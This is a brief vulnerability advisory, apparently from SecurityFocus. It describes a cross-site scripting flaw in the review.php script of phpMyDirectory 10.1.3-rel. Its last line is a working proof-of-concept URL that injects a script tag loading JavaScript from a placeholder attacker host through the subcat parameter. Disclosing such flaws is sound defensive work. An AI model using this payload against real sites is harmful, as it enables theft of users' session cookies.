11 lines
No EOL
580 B
Text
11 lines
No EOL
580 B
Text
source: http://www.securityfocus.com/bid/12900/info
|
|
|
|
phpMyDirectory is prone to a cross-site scripting vulnerability.
|
|
|
|
The problem presents itself when malicious HTML and script code is sent to the application through various parameters of the 'review.php' script.
|
|
|
|
This issue may allow for theft of cookie-based authentication credentials or other attacks.
|
|
|
|
phpMyDirectory 10.1.3-rel is reported vulnerable, however, it is possible that other versions are affected as well.
|
|
|
|
http://www.example.com/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script> |